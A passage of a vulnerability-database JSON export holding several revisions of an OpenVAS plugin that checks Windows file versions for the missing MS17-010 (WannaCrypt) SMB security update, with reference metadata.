win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-10-11T12:33:57"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "38e265d4aaf23980eab47f1c2c0ea7a93e4a1f3d461b6ab773f1f134194b7f72", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2017-05-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-09-01T23:41:34", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010.nasl 6225 2017-05-26 19:21:16Z cfi $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389) \n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"$Revision: 6225 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-26 21:21:16 +0200 (Fri, 26 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Get the vulnerable file version and\n check appropriate patch is applied or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\n\n Impact Level: System\");\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 x86\n\n Microsoft Windows 8 x86/x64\n\n Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link,\n https://technet.microsoft.com/library/security/MS17-010\n http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name : \"URL\" , value : \"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nsysVer = \"\";\n\n## Check for OS and Service Pack\n## Windows XP, server2003 and windows 8 support given due to the dispute over WannaCry Ransomware.\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\n##Fetch the version of files\nvistVer = fetch_file_version(sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n ## Windows Vista and Server 2008\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n ## Check for srv.sys version\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n \n ## Windows XP\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for srv.sys version, on 32bit xp sp3\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## Windows 2003, Windows XP SP2 64bit\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## Windows 8\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n \n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n ## Windows 7 and Windows Server 2008 R2\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Server 2012\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n ## Check for win32k.sys version\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 8.1 and Server 2012 R2\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n ## Check for win32k.sys version\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\n##Fetch the version of 'Edgehtml.dll'\nedgeVer = fetch_file_version(sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\n##Windows 10\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n ## Check for Edgehtml.dll version\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n ## Windows 10 Version 1511\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n ## Windows 10 version 1607 and Windows Server 2016\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-09-01T23:41:34"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "b929cc8244ede59aa0166be899f56de0d83e66157c656586c6395101b48f4ab9", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-29T18:34:05", "history": [], "viewCount": 2230, "enchantments": {"dependencies": {"modified": "2019-05-29T18:34:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:34:05", "value": 8.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 x86\n\n Microsoft Windows 8 x86/x64\n\n Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", 